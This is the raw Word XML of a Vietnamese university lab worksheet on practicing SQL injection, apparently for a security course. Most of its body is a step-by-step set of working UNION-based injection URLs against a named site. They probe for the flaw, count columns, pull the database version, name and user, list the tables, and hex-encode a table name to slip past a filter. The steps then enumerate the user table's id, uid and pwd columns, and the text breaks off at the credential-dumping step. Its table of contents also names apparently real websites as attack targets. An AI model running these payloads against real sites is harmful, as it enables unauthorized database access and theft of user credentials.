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816F7F" w:rsidRPr="008A1FD0" w14:paraId="1BF8C63B" w14:textId="77777777" w:rsidTr="35A679DD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1180" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B791A62" w14:textId="77777777" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="0031173D">
            <w:pPr>
              <w:pStyle w:val="txtTieuDe02"/>
            </w:pPr>
            <w:r w:rsidRPr="008A1FD0">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7965A32E" wp14:editId="4B320A3B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264B2E68" w14:textId="0A2A035B" w:rsidR="007E5344" w:rsidRDefault="007E5344" w:rsidP="35A679DD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bookmarkStart w:id="0" w:name="_Toc479091051"/>
            <w:r w:rsidRPr="008A1FD0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">THỰC HÀNH TẤN CÔNG </w:t>
            </w:r>
            <w:r w:rsidR="00856A03" w:rsidRPr="008A1FD0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>SQL INJECTION</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
          <w:p w14:paraId="7FB7BFB7" w14:textId="016EF326" w:rsidR="0075075D" w:rsidRPr="008A1FD0" w:rsidRDefault="0075075D" w:rsidP="35A679DD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Sử dụng </w:t>
            </w:r>
            <w:r w:rsidR="00BC268F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>đường dẫn URL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6868EA7E" w14:textId="653E0F94" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="00816F7F" w:rsidP="008459D0">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31D992D6" w14:textId="77777777" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="00816F7F">
      <w:pPr>
        <w:pStyle w:val="txtTieuDe03"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E4D4688" w14:textId="77777777" w:rsidR="006557BB" w:rsidRPr="00070F53" w:rsidRDefault="006557BB" w:rsidP="006557BB">
      <w:pPr>
        <w:pStyle w:val="txtTieuDe03"/>
        <w:ind w:firstLine="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00070F53">
        <w:t xml:space="preserve">Nhóm học phần:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00070F53">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2597B5C3" w14:textId="77777777" w:rsidR="006557BB" w:rsidRPr="00070F53" w:rsidRDefault="006557BB" w:rsidP="006557BB">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00070F53">
        <w:t>1) Mã Sinh viên, Họ và Tên:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4824B21C" w14:textId="77777777" w:rsidR="006557BB" w:rsidRPr="00070F53" w:rsidRDefault="006557BB" w:rsidP="006557BB">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00070F53">
        <w:t>2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D1C5D2" w14:textId="77777777" w:rsidR="006557BB" w:rsidRPr="00070F53" w:rsidRDefault="006557BB" w:rsidP="006557BB">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="00070F53">
        <w:t>3)</w:t>
      </w:r>
      <w:r w:rsidRPr="00070F53">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00070F53">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00070F53">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00070F53">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="049EE77A" w14:textId="77777777" w:rsidR="006557BB" w:rsidRPr="00070F53" w:rsidRDefault="006557BB" w:rsidP="006557BB">
      <w:pPr>
        <w:pStyle w:val="txtTieuDe03"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F120650" w14:textId="5ABBA329" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="006557BB" w:rsidP="006557BB">
      <w:pPr>
        <w:pStyle w:val="txtTieuDe01"/>
      </w:pPr>
      <w:r w:rsidRPr="00070F53">
        <w:t>MỤC LỤC</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="-2036571086"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="45F5C170" w14:textId="4D6854F9" w:rsidR="008A1FD0" w:rsidRDefault="0031173D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r w:rsidRPr="008A1FD0">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="008A1FD0">
            <w:rPr>
              <w:sz w:val="18"/>
              <w:szCs w:val="18"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="008A1FD0">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc175586997" w:history="1">
            <w:r w:rsidR="008A1FD0" w:rsidRPr="004B3291">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="008A1FD0"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8A1FD0" w:rsidRPr="004B3291">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Giới thiệu</w:t>
            </w:r>
            <w:r w:rsidR="008A1FD0">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="008A1FD0">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="008A1FD0">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc175586997 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="008A1FD0">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="008A1FD0">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="008A1FD0">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="008A1FD0">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="000AC1B4" w14:textId="72D7B238" w:rsidR="008A1FD0" w:rsidRDefault="008A1FD0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75586998" w:history="1">
            <w:r w:rsidRPr="004B3291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4B3291">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Các bước tấn công SQL Injection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_Toc175586998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7B5CBF7" w14:textId="714C3DFA" w:rsidR="008A1FD0" w:rsidRDefault="008A1FD0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75586999" w:history="1">
            <w:r w:rsidRPr="004B3291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4B3291">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Tấn công Website https://nhuaphucthinh.com.vn/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_Toc175586999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45E97B3" w14:textId="1CB1D0FB" w:rsidR="008A1FD0" w:rsidRDefault="008A1FD0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75587000" w:history="1">
            <w:r w:rsidRPr="004B3291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4B3291">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Tấn công các Website http://</w:t>
            </w:r>
            <w:r w:rsidRPr="004B3291">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>wandertour</w:t>
            </w:r>
            <w:r w:rsidRPr="004B3291">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>.ddns.net:8282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_Toc175587000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BEE94C1" w14:textId="6458C956" w:rsidR="008A1FD0" w:rsidRDefault="008A1FD0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75587001" w:history="1">
            <w:r w:rsidRPr="004B3291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4B3291">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>BÀI TẬP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_Toc175587001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D4695A" w14:textId="1ACD8B14" w:rsidR="00816F7F" w:rsidRPr="008A1FD0" w:rsidRDefault="0031173D">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="782"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9629"/>
            </w:tabs>
            <w:rPr>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="008A1FD0">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="58A2E0E4" w14:textId="3F117F25" w:rsidR="007E5344" w:rsidRPr="008A1FD0" w:rsidRDefault="00F03A82" w:rsidP="69DCF625">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&gt;&gt; Yêu cầu chụp hình ảnh là kết quả thực hành của SV. Không sử dụng lại hình ảnh của bài lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF139AB" w14:textId="77777777" w:rsidR="007E5344" w:rsidRPr="008A1FD0" w:rsidRDefault="007E5344" w:rsidP="57CBC74E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc19092640"/>
      <w:bookmarkStart w:id="2" w:name="_Toc21091651"/>
      <w:bookmarkStart w:id="3" w:name="_Toc175586997"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Giới thiệu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="6EB2D60D" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="00F9409C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc175586998"/>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Các bước tấn công SQL Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="5DCAA828" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Dò </w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>tìm trang web có khả năng bị lỗi SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A1F50D" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="00F9409C">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t xml:space="preserve">Đầu tiên ta truy cập vào một trang web bất kì. Ở đường dẫn URL của trang web, ta chèn thêm một kí tự đặc biệt, ví dụ như dấu ’. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A42CA7D" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="00F9409C">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t xml:space="preserve">Nếu như trang web có lỗi, thì có thể thực hiện được việc tấn công. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5F0449" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>http://www.tototo.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B344D6C" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>http://www.tototo.com/?frame=product_detail&amp;id=322</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708AE719" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="00F9409C">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Thêm dấu nháy vào cuối chuỗi URL để phát hiện lỗi SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD09322" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>http://www.tototo.com/?frame=product_detail&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id=322’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA94C4E" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Bước 2: Dò tìm số cột trong câu lệnh SELECT hiển thị trang Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E114B8" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="00F9409C">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Sử dụng câu lệnh UNION để chèn vào đường dẫn URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE49C28" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>http://www.tototo.com/?frame=product_detail&amp;id=322 UNION SELECT 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16475EAF" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>http://www.tototo.com/?frame=product_detail&amp;id=322 UNION SELECT 1,2--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B08233C" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:lastRenderedPageBreak/>
        <w:t>http://www.tototo.com/?frame=product_detail&amp;id=322 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123C8F77" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="00F9409C">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Sau khi kiểm tra bằng cách chèn thêm lệnh vào đường dẫn, ta đã xác định được CSDL của web gồm có 16 bảng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38587377" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t xml:space="preserve">Bước 3: Dò tìm thông tin CSDL </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34526EA7" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtGachDong"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t xml:space="preserve">Xem vị trí các trường xuất hiện trên trang Web: Đổi giá trị 322 </w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:t xml:space="preserve"> NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596BCF03" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>http://www.tototo.com/?frame=product_detail&amp;id=NULL UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F197D5" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtGachDong"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Để biết được version của CSDL, ta chèn thêm biến version() thay vào chỗ cột số 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5A95E1" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>http://www.tototo.com/?frame=product_detail&amp;id=NULL UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7034A7DC" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="00F9409C">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t xml:space="preserve">Dựa vào kết quả, ta biết được phiên bản CSDL đó sử dụng là: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.6.38</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F189BEF" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Để biết được tên của CSDL, ta chèn thêm biến version() thay vào chỗ cột số 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E22E0C9" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>http://www.tototo.com/?frame=product_detail&amp;id=NULL UNION SELECT 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B166B5D" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtGachDong"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Dựa vào kết quả, ta biết được CSDL của trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2621C1A7" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtGachDong"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Ngoài ra, ta có thể biết thêm một số thông tin khác như người quản trị mạng của trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780EE8AD" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>http://www.tototo.com/?frame=product_detail&amp;id=NULL UNION SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0119D9" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t> Dựa vào kết quả, ta biết được người quản trị mạng của trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18499458" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Bước 4: Tìm các bảng có trong CSDL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CCA6D8" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="00F9409C">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Để biết được tên các bảng có trong CSDL, ta thực hiện dòng lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B299320" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>http://www.tototo.com/?frame=product_detail&amp;id=NULL UNION SELECT 1,2,group_concat(unhex(hex(table_name))),4,5,6,7,8,9,10,11,12,13,14,15,16 FROM information_schema.tables WHERE table_schema=database()--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FDE042" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="00F9409C">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t xml:space="preserve">Kết quả thu được là danh sách các bảng có trong CSDL: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A910F35" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="00F9409C">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:rStyle w:val="style9"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tbl_config,tbl_content,tbl_content_category,tbl_order,tbl_order_detail,tbl_product, tbl_product_category,tbl_product_new,tbl_product_special,</w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:rStyle w:val="style9"/>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tbl_user</w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:rStyle w:val="style9"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,tbl_visitor</w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0125D0" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="00F9409C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49149A4B" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Bước 5: Chuyển đổi chuỗi tbl_user sang giá trị Hexa tương ứng để vượt bộ lọc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36700125" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>https://www.online-toolz.com/tools/text-hex-convertor.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E8B060" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Bước 6: Tìm thông tin các cột có trong bảng tbl_user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C314BC" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:lastRenderedPageBreak/>
        <w:t>http://www.tototo.com/?frame=product_detail&amp;id=NULL  UNION SELECT 1,2,group_concat(unhex(hex(column_name))),4,5,6,7,8,9,10,11,12,13,14,15,16 FROM information_schema.columns WHERE table_name=0x74626c5f75736572--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FF638B" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtGachDong"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t xml:space="preserve">Dựa vào kết quả hiển thị sau câu lệnh trên, ta thu được đó là các cột có trong bảng tbl_user: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A1FD0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>id,uid,pwd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249A7D8D" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
        <w:t>Bước 7: Thu nhập kết quả từ các cột tìm được trong bảng tbl_user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CF4A96" w14:textId="77777777" w:rsidR="00F9409C" w:rsidRPr="008A1FD0" w:rsidRDefault="00F9409C" w:rsidP="008A1FD0">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="008A1FD0">
